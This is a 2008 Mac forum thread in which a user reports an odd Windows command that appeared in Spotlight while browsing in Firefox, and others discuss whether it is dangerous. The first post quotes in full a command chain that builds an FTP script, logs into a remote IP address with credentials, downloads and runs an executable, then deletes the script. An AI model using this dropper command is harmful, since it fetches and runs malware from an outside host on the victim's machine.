PNWDweller Posted November 25, 2008 Share Posted November 25, 2008 Ok, so I am minding my own business and the browser freezes (mind you, was on Google.com), and spotlight gets the following entered into it: echo open 87.230.22.187/https/img/ 21 >> ik &echo user zf Z@z1humensk1 >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exitecho You got owned So, I know this is someone's lame attempt at a hack, but what gets me is how it has come into the system. I have the normal firewall rules on and no unusual processes running. I was running through my WPA2 protected WIFI connection, but have jumped to hard wired for now and disabled the network for now. I have not downloaded any questionable content from anywhere and stay updated. I went as far as to go in and install anti-virus on the Mac (even though some may consider it a moot point). Negative on the results. Of course, this sounds like a windows virus. No other windows systems were connected to the network at the time of this 'hack'. Any ideas? Google returns ZERO results. Link to comment Share on other sites More sharing options...
LTD Posted November 25, 2008 Share Posted November 25, 2008 get com.exe It appears to be Windows related. But the manner in which it appeared to you is really odd. Link to comment Share on other sites More sharing options...
giga Veteran Posted November 25, 2008 Veteran Share Posted November 25, 2008 Seems like the hacker is pretty stupid since spotlight won't even execute that command heh. Not to mention that it was a Windows executable which can't really do much on your machine. Link to comment Share on other sites More sharing options...
LTD Posted November 25, 2008 Share Posted November 25, 2008 Seems you're ok. No harm done. Carry on. ;) Link to comment Share on other sites More sharing options...
Mercellus Posted November 25, 2008 Share Posted November 25, 2008 Normally something like a JavaScript could possibly execute this in the background on a Windows machine to take advantage of it... on Mac OS X, not so much. Just double-check your applications, make sure you don't have anything odd installed. If you are really concerned, make a new user account, which should isolate it further. Link to comment Share on other sites More sharing options...
MasterC Posted November 25, 2008 Share Posted November 25, 2008 What browser? I'm going to take a guess and say Firefox, since it was a Windows based attack. Link to comment Share on other sites More sharing options...
PNWDweller Posted November 25, 2008 Author Share Posted November 25, 2008 Firefox it was. But I don't see how that could have made much of a difference. Anyway, I have since rebooted the machine due to a Safari Update Apple sent out to my system so hopefully if there was a "resident" program in line, then it would have terminated. I knew the .exe was a windows executable, so I wasn't worried about that, except perhaps that the codeweavers crossover program is installed. Link to comment Share on other sites More sharing options...
Recommended Posts